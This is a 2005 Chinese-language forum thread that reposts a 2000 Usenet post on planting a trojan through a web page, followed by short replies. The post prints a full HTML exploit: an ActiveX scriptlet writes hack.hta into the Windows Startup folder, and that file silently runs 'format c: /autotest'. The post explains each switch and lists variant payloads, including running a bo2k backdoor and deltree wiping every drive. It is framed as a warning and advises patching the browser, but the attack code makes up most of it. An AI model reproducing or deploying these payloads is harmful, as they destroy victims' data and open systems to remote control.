廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 3592 個閱讀者
04:00 ~ 4:30 資料庫備份中,需等較久的時間,請耐心等候
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
阿豆仙 手機
數位造型
個人文章 個人相簿 個人日記 個人地圖
初露鋒芒
級別: 初露鋒芒 該用戶目前不上站
推文 x10 鮮花 x66
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
網頁中安裝的木馬
網頁中安裝的木馬
收錄這篇文章只是提醒網友們,網際網路不是安全的環境,道高一尺,魔高一丈,任何技術一直在進步,很多人都在默默的研究和修補系統漏洞,當然也有很多「不懂事的人」在私底下做壞事〈只會拿著現成的工具到處攻擊別人那種人〉? F在台灣的電子商務尚未成熟,還有一段好長的路要走,置身網路中也別為了一時之便,隨意留下個人資料,在你遨遊網路時也要時時刻刻做好安全措施喔。以下的文章千萬不能拿去做壞事...
From: alerter.bbs@bbs.cs.nthu.edu.tw (小色男)
Newsgroups: tw.bbs.comp.security
Subject: Re: 裝木馬的技巧????
Date: 26 Sep 2000 08:51:56 GMT
Organization: 清華資訊(楓橋驛站)
網頁安裝木馬其實也是有可能的

<HTML>
<header></header>
<BODY>
Hacking Your Computer .
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta";
scr.Doc="
<SCRIPT>wsh.Run('start.exe /m FORMat c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

</BODY>
</HTML>

(懂HTML的人應該就看得出來其中精隨)

現在我大概來解釋其中幾個項目所寫的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"

這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta

wsh.Run('start.exe /m FORMat c:/q /autotest /u');

通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。

它是一個微軟沒有公開的功能,鍵入後FORMat的動作便會被強制執行。

這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。

最後start.exe再配合/m選項可以使FORMat的DOS-prompt視窗在執行的時候處於最小化的狀態。

執行其他攻擊指令的方法:

只要修改“start.exe /m FORMat c:/q /autotest /u”這一項便形。

start.exe /m FORMat c:/q /autotest /u

其中的“c:”可以換做其他的硬碟。

(path)\bo2k.exe

執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

殺掉對方硬碟底下所有的檔案。

start.exe /m deltree /y c:\windows\system\*.*

殺掉對方c:\windows\system\目錄底下的所有檔案。

後敘:

預防遭此手段的破壞就是到微軟去更新你的瀏覽器。 表情

請勿拿來害人,只供給學術研究來使用!!! 這篇是由別的論壇裡挖出來的!!


[ 此文章被mn1212在2005-03-14 01:37重新編輯 ]



獻花 x0 回到頂端 [樓 主] From:廣東省 | Posted:2005-03-11 23:22 |
klske
個人頭像
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x0 鮮花 x3
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

我有時開啟新網頁時防毒軟體就會說中病毒了,應該就是類似這種,真可怕>o<


知之為知之,不知為不知,是知也~
獻花 x0 回到頂端 [1 樓] From:台灣中華電信 | Posted:2005-03-12 10:41 |
noid
數位造型
個人文章 個人相簿 個人日記 個人地圖
初露鋒芒
級別: 初露鋒芒 該用戶目前不上站
推文 x0 鮮花 x19
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

這是很久以前低東西囉~
現在應該都沒有用了吧
(除非還有人在用IE4.0...)
不過還是謝謝囉~


獻花 x0 回到頂端 [2 樓] From:局域網對方和您在同一內部網 | Posted:2005-03-12 15:50 |
SENFO 手機
個人頭像
個人文章 個人相簿 個人日記 個人地圖
初露鋒芒
級別: 初露鋒芒 該用戶目前不上站
推文 x0 鮮花 x4
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

雖然說是以前安裝木馬的方法,但是學點FORMAT的參數也是不錯的,說不定以後會用到~


獻花 x0 回到頂端 [3 樓] From:台灣數位聯合 | Posted:2005-03-14 14:50 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.077777 second(s),query:16 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言